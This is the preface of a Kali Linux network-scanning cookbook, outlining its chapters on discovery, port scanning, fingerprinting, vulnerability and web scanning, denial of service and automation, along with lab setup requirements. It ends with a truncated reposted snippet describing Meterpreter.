Kali Linux Network Scanning Cookbook: Over 90 hands-on recipes explaining how to leverage custom scripts and integrated tools in Kali Linux to effectively master network scanning

Introduction
The face of hacking and cyber crime has dramatically transformed over the past couple of decades. At the end of the 20th century, many people had no idea what cyber crime was. Those people thought that hackers were malevolent mathematical geniuses that hid in dimly lit basements and spoke in binary. But as of late, we have seen the rise of a whole new brand of hackers. Because of the public availability of hacking software and tools, the hacker of the new era could easily be your next-door neighbor, your local gas station attendant, or even your 12-year-old child. Script kiddie tools such as the Low Orbit Ion Cannon (LOIC) have been used to launch massive Distributed Denial of Service (DDoS) attacks against large corporations and organizations. This free Windows download merely requires that you enter a target URL, and it also has a graphic interface that bears a striking resemblance to a space age video game. In a world where hacking has become so easy that a child can do it, it is absolutely essential that organizations verify their own level of protection by having their networks tested using the same tools that cyber criminals use against them. But the basic usage of these tools is not sufficient knowledge to be an effective information security professional. It is absolutely critical that information security professionals understand the techniques that are being employed by these tools, and why these techniques are able to exploit various vulnerabilities in a network or system. A knowledge of the basic underlying principles that explains how these common attack tools work enables one to effectively use them, but more importantly, it also contributes to one's ability to effectively identify such attacks and defend against them.

The intention of this book is to enumerate and explain the use of common attack tools that are available in the Kali Linux platform, but more importantly, this book also aims to address the underlying principles that define why these tools work. In addition to addressing the highly functional tools integrated into Kali Linux, we will also create a large number of Python and bash scripts that can be used to perform similar functions and/or to streamline existing tools. Ultimately, the intention of this book is to help forge stronger security professionals through a better understanding of their adversary.

What this book covers
Chapter 1, Getting Started, introduces the underlying principles and concepts that will be used throughout the remainder of the book.
Chapter 2, Discovery Scanning, covers techniques and scanning tools that can be used to identify live systems on a target network, by performing layer 2, layer 3, and layer 4 discovery.
Chapter 3, Port Scanning, includes techniques and scanning tools that can be used to enumerate running UDP and TCP services on a target system.
Chapter 4, Fingerprinting, explains techniques and scanning tools that can be used to identify the operating system and services running on a target system.
Chapter 5, Vulnerability Scanning, covers techniques and scanning tools that can be used to identify and enumerate potential vulnerabilities on a target system.
Chapter 6, Denial of Service, introduces techniques and attack tools that can be used to exploit denial of service vulnerabilities identified on a target system.
Chapter 7, Web Application Scanning, provides techniques and tools that can be used to identify and exploit web application vulnerabilities on a target system.
Chapter 8, Automating Kali Tools, introduces scripting techniques that can be used to streamline and automate the use of existing tools in Kali Linux.

What you need for this book
To follow the exercises addressed in this book or to further explore on your own, you will need the following components:
+ A single personal computer (Mac, Windows, or Linux) with sufficient resources that can be shared across multiple virtual machines. At minimum, you should have 2 GB of RAM. It is recommended that for optimal performance, you use a system with 8 to 16 GB of RAM. Multiple processors and/or processor cores are also recommended.
  - If you are running a system with limited resources, try to minimize the number of virtual machines that are running simultaneously when completing the exercises.
+ Virtualization software to run your security lab environment. Some of the available options include the following:
  - VMware Fusion (Mac OS X)
  - VMware Player (Windows)
  - Oracle VirtualBox (Windows, Mac OS X, or Linux)
+ Multiple operating systems to run in the security lab environment. Acquisition and installation of each of these will be discussed in detail in Chapter 1, Getting Started. The operating systems needed include the following:
  - Kali Linux
  - Metasploitable2
  - An Ubuntu server
  - Windows OS (Windows XP SP2 is recommended)

Who this book is for
This book is intended for the following users:
+ Information technology professionals
+ Information security professionals
+ Casual security or technology enthusiasts
The book assumes that the reader has little to no familiarity with penetration testing, Linux, scripting, and TCP/IP networking. Each section in this book initially addresses the underlying principles, prior to discussing the techniques that employ them.
Via TimoBook
Hacking’Kali: Penetration testing (meterpreter & metasploitable2 12)
Screenshot 1: Final (article): Hacking’Kali: Penetration testing (metasploit 11) ;)
Interacting with Meterpreter: Meterpreter is an advanced, dynamic and extensible payload that uses in-memory DLL injection actors and extends across the network at runtime. It communicates over a socket actor and provides a complete